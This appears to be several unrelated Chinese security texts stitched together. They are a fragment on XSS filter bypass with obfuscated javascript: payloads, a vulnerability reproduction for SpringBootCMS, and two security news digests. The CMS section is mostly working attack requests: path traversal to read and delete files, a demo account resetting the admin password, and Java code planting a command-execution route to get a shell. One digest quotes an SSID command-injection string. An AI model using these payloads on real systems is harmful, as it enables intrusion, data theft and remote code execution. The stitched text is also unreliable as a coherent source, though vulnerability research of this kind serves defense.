然后就在此处卡了很久，我也想过不使用alert使用prompt这些函数但就是不行，后面发现后面就是不能跟括号和反引号 这时候就在想，还有不能用括号进行弹窗的函数？给我整懵逼了，找了一大圈一个都没找到都需要用括号,alert后不需要括号和反引号的也过不了。 最后在推特上看到了这个最终完成绕过 https://aem1k.com/aurebesh.js/#java本地测试payload <a/href="javascript;{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click<a href=ja&NewLine;vascript:k='',a=!k+k,f=!a+k,g=k+{},kk=a[k++],ka=a[kf=k],kg=++kf+k,ak=g[kf+kg],a[ak+=g[k]+(a.f+g)[k]+f[kg]+kk+ka+a[kf]+ak+kk+g[k]+ka][ak](f[k]+f[kf]+a[kg]+ka+kk+"(k)" 最终效果

SpringBootCMS，极速开发，动态添加字段，自定义标签，动态创建数据库表并crud数据，数据库备份、还原，动态添加站点(多站点功能)，一键生成模板代码，让您轻松打造自己的独立网站，同时也方便二次开发，让您快速搭建个性化独立网站，为您节约更多时间。 http://www.jrecms.com环境搭建 修改 src/main/resources/application.properties 中对应的数据库地址，在本地创建数据库并导入根目录下的 sql 文件 运行 src/main/java/com/cms/App.java 漏洞复现分析 未授权任意文件下载 GET /common/file/download?fileKey=../../resources/application.properties HTTP/1.1 Host: localhost:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://localhost:8888/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close com.cms.controller.common.FileController#download 通过传过来的参数 fileKey 未经过任何过滤就拼接到读取文件的路径中，最后读取该文件并下载返回 越权修改管理员密码 系统中存在演示账号，演示账号的用户名和密码为 read/123456，演示用户在前端并不能操作相关功能，但是可以通过直接构造数据包，触发相对应的功能 POST /admin/admin/reset HTTP/1.1 Host: localhost:8888 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8888/admin/role Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=7CD6B69DCC495750492D0D89B4713A52 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 4 id=1 成功修改了管理员 admin 的密码，修改为 123456 com.cms.controller.admin.AdminController#reset com.cms.filter.PermissionFilter#doFilter 根本原因是没有将 reset 操作添加在过滤中，导致演示账号也可以执行重置密码的操作。 其他的操作就会有相关的提示 授权任意文件读取 构造链接 http://localhost:8888/admin/template/edit?directory=default/../../../resources/&fileName=application.properties com.cms.controller.admin.TemplateController#edit 对传入的参数 directory 和 fileName 未进行任何处理就拼接到 filepath 中 读取并显示 授权任意文件修改可 getshell 查找其中不需要授权就可以访问到的路由对应的文件 http://localhost:8888/admin/template/edit?fileName=../../../../src/main/java/com/cms/controller/common/FileController.java 添加恶意代码，增加命令执行的路由文件 @RequestMapping("/exec") public void exec(String command,HttpServletRequest request, HttpServletResponse response) throws Exception{ // 执行命令并获取输出结果 ProcessBuilder processBuilder = new ProcessBuilder(); processBuilder.command("cmd", "/c", command); Process process = processBuilder.start(); // 读取命令输出的结果 String output = ""; BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = inputReader.readLine()) != null) { output +=line; } response.setHeader("Content",output); } 重启项目后，发送路由信息 com.cms.controller.admin.TemplateController#update 漏洞存在的原因是因为在更新代码的时候，没有对代码内容进行校验，可任意修改代码，写入恶意代码就会触发命令执行 授权任意文件删除 构造数据包 GET /admin/database/delete?name=../../../../../test.txt HTTP/1.1 Host: localhost:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=410D94FAA33FE9021AD6B0C3E842F9F9 Connection: close com.cms.controller.admin.DatabaseController#delete com.cms.utils.BackupUtils#delete

1、Mirai变种利用13个路由器漏洞扩大攻击范围 https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits Mirai是一种基于Linux的DDoS恶意软件，它可以感染各种物联网设备，如摄像头、路由器、打印机等，将它们组成僵尸网络，用于发动大规模的DDoS攻击。近日，一种名为IZ1H9的Mirai变种被发现，它利用了13个路由器漏洞，可以攻击D-Link、Zyxel、TP-Link、TOTOLINK等品牌的路由器。IZ1H9通过暴力破解或利用硬编码的弱口令，远程执行代码，感染目标设备。然后，它会将 2、D-Link WiFi 6扩展器被发现存在严重的命令注入漏洞 https://www.bleepingcomputer.com/news/security/d-link-wifi-range-extender-vulnerable-to-command-injection-attacks/ D-Link DAP-X1860是一款流行的WiFi 6扩展器，它可以增强无线信号的覆盖范围和稳定性。然而，近日，安全研究人员发现，该设备存在一个严重的命令注入漏洞，可以让攻击者在设备上执行任意代码，进行拒绝服务或远程控制攻击。该漏洞的原理是，当设备扫描附近的WiFi网络时，如果遇到一个包含单引号和双和符号的SSID(如“Test’ && uname -a &&”) 3、微软为阻止恶意软件传播，将在Windows中废除VBScript https://www.bleepingcomputer.com/news/security/microsoft-to-kill-off-vbscript-in-windows-to-block-malware-delivery/ VBScript(也称为Visual Basic Script或Microsoft Visual Basic Scripting Edition)是一种类似于Visual Basic或Visual Basic for Applications(VBA)的编程语言，于1996年8月推出，已有近30年的历史。它主要用于在Internet Explorer浏览器中运行客 4、欧洲航空公司Air Europa遭遇数据泄露 https://www.bleepingcomputer.com/news/security/air-europa-data-breach-customers-warned-to-cancel-credit-cards/ Air Europa航空公司是西班牙最大的航空公司之一，近日遭到了一场严重的数据泄露事件，导致数千名客户的个人信息和信用卡信息被黑客窃取。该公司在其官方网站上发布了一份声明，承认了数据泄露的事实，并表示已经采取了相应的措施，包括通知有关当局和信用卡公司。该公司还建议受影响的客户尽快取消或更换他们的信用卡，以防止进一步的损失。泄露事件中暴露的信用卡详细信息包括卡号、有效期以及 5、谷歌发布Chrome 118 修补了 20 个漏洞 https://www.securityweek.com/chrome-118-patches-20-vulnerabilities/ 谷歌周二宣布向稳定渠道发布 Chrome 118，修复了 20 个漏洞，其中包括外部研究人员报告的 14 个漏洞。外部报告的缺陷中最严重的是 CVE-2023-5218，这是一个严重错误，被描述为站点隔离中的释放后使用问题，站点隔离是 Chrome 的组件，负责防止站点窃取其他站点的数据。 6、cURL/libcurl中的严重漏洞使企业系统面临风险 https://www.securityweek.com/critical-socks5-vulnerability-in-curl-puts-enterprise-systems-at-risk/ cURL 数据传输项目的维护者周三推出了针对严重内存损坏漏洞的补丁，该漏洞使数百万企业操作系统、应用程序和设备面临恶意黑客攻击。 7、美国CISA警告 Adobe Acrobat Reader 漏洞被积极利用 https://thehackernews.com/2023/10/us-cybersecurity-agency-warns-of.html 美国网络安全和基础设施安全局 (CISA) 周二将Adobe Acrobat Reader 中的一个高严重性缺陷添加到其已知被利用的漏洞 ( KEV ) 目录中，并引用了主动利用的证据。 8、杭州亚运会大火背后，是网安和黑产的疯狂对抗 https://www.freebuf.com/news/380146.html 杭州亚运会是史上设项最多、参赛人数最多、竞赛组织难度最高的亚运会，已成为全世界最复杂的综合性体育赛事之一。在开幕前，网络安全团队便开启了细致的安全整理工作，共处置公共互联网恶意IP地址和域名6.4万余个，清除移动互联网恶意程序 6500余个。组织建立与79个重点保障对象的“一对一”对接协调机制，实时监测120余个重要域名、2100余个重要IP地址，全力做好了攻击流量清洗及域名安全保障。但在亚运会开赛后，网络威胁风险仍然不可避免地增加。为了消除隐患，根据工信部披露的数据，在赛事期间共处置公共互联网恶意IP地址和域 9、全球众多黑客组织加入巴以冲突数字斗争战局 https://www.secrss.com/articles/59473 全球黑客组织正在“选边站队”，对以色列和巴勒斯坦数字基础设施开展网络攻击，在网络空间塑造了巴以冲突的第二战场。 10、黑客通过修改网上商店的404页面来窃取信用卡 https://www.bleepingcomputer.com/news/security/hackers-modify-online-stores-404-pages-to-steal-credit-cards/ 这种技术是Akamai安全情报小组的研究人员观察到的三种变体之一，另外两种变体将代码隐藏在HTML图像标签的“onerror”属性和图像二进制中，使其显示为元像素代码片段。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、佛罗里达州巡回法院遭ALPHV勒索软件攻击 https://www.bleepingcomputer.com/news/security/alphv-ransomware-gang-claims-attack-on-florida-circuit-court/ 据报道，ALPHV(又名BlackCat)勒索软件团伙声称对佛罗里达州西北部的州立法院发动了一次攻击，这些法院属于第一司法巡回法院。据称，威胁者获取了包括法官在内的员工的个人信息，如社会保障号和简历。研究人员表示，ALPHV是今年最复杂的勒索软件之一，具有高度可定制的功能集，可以对各种目标进行攻击。ALPHV团伙在其暗网网站上公布了部分被盗数据的截图，并要求受害者支付赎金，否则 2、Volex PLC遭黑客入侵部分IT系统和数据 https://www.hackread.com/uk-power-data-manufacturer-volex-cyberattack/ Volex PLC是一家总部位于英国的电力和数据传输产品制造商，其产品广泛应用于汽车、医疗、工业和消费电子领域。报道称，该公司近日遭受了一次网络攻击，导致攻击者未经授权地访问了该公司的部分IT 统和数据。Volex PLC表示，该公司在发现攻击后迅速采取了应对措施，并实施了一项事件响应计划。该公司还声称，目前没有证据表明该事件造成了“重大财务影响”，也没有影响到其客户或供应商的数据。Volex PLC表示，该公司正在与相关当局合作，调查事件的原因和影响 3、libcue库漏洞导致GNOME Linux系统遭受远程代码执行攻击 https://github.blog/2023-10-09-coordinated-disclosure-1-click-rce-on-gnome-cve-2023-43641/ libcue是一个用于解析cue文件的库，它被集成到了GNOME Linux系统中的一款搜索引擎工具Tracker Miners中。Tracker Miners可以对系统中的文件进行索引，方便用户访问。然而，近日发现libcue库存在一个严重的内存损坏漏洞，编号为CVE-2023-43641，CVSS评分为8.8。该漏洞影响了2.2.1及之前的版本，如果被利用，可能导致远程代码执行(RCE)。该漏洞的利用方式非常 4、HelloKitty勒索软件源代码在黑客论坛上泄露 https://securityaffairs.com/152182/malware/hellokitty-ransomware-source-code-leaked.html HelloKitty是一种针对企业的勒索软件，它会在加密受害者的文件后，将解密密钥发送给攻击者，从而让他们控制受害者的数据。据报道，HelloKitty勒索软件的源代码在一个黑客论坛上被泄露，该论坛的管理员称，他们从一个名为“L0ckBit”的用户那里获得了源代码，并将其公开分享给其他用户。据悉，该源代码包含了HelloKitty勒索软件的主要功能模块，以及用于加密和解密文件的算法。该事件引起了安全界的关注，因为He 5、新的DDoS攻击"HTTP/2快速重置"达到了创记录的每秒 3.98 亿次请求 (rps) https://securityaffairs.com/152278/hacking/ddos-http-2-rapid-reset-technique.html Google Cloud 本周发布博客介绍最近一段时间新出现的攻击类型：HTTP/2 快速重置。攻击者利用这个方法从 8 月份开始对谷歌云平台的客户发起攻击，其中攻击者在某次攻击中在 1 秒内发出了高达 3.98 亿个请求，这也是目前有记录以来的每秒请求数最高的一次攻击。 6、curl&libcurl 高危漏洞今日发布修复补丁 https://www.freebuf.com/news/380169.html curl项目的作者bagder(Daniel Stenberg)在GitHub中发布消息称，将在2023年10月11日发布curl的8.4.0版本。同时，他们还将公开两个漏洞：CVE-2023-38545和CVE-2023-38546。 7、微软修复了 WordPad、Skype for Business 中被利用的零日漏洞 https://www.securityweek.com/microsoft-fixes-exploited-zero-days-in-wordpad-skype-for-business/ 微软安全响应团队周二推出了大量软件和操作系统更新，以覆盖 Windows 生态系统中的 100 多个漏洞，并警告称其中 3 个漏洞已被利用。 8、最新的 Balada 注入器活动针对未修补的 tagDiv 插件 https://cyware.com/news/latest-balada-injector-campaign-targets-unpatched-tagdiv-plugin-37f55318 Balada Injector 的基础设施和攻击方法迅速发展，导致大量 WordPress 网站遭到入侵。Balada 恶意软件注入攻击被发现利用易受攻击的 tagDiv 高级主题插件来针对报纸和新闻网站。 9、巴以冲突中双方黑客将 SCADA 和 ICS 系统作为攻击目标 https://securityaffairs.com/152224/hacktivism/hacktivists-palestine-israel-after-scada-ics.html 亲以色列和亲巴勒斯坦的黑客活动分子都加入了战斗，并将 SCADA 和 ICS 系统作为攻击目标。 10、 金融监管部门提示：谨防“AI 换脸”等新型诈骗手段 https://www.ithome.com/0/723/619.htm 国家金融监督管理总局北京监管局近日发布风险提示，提醒消费者近期重点防范三种新型欺诈手段，守护家人亲朋财产安全。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。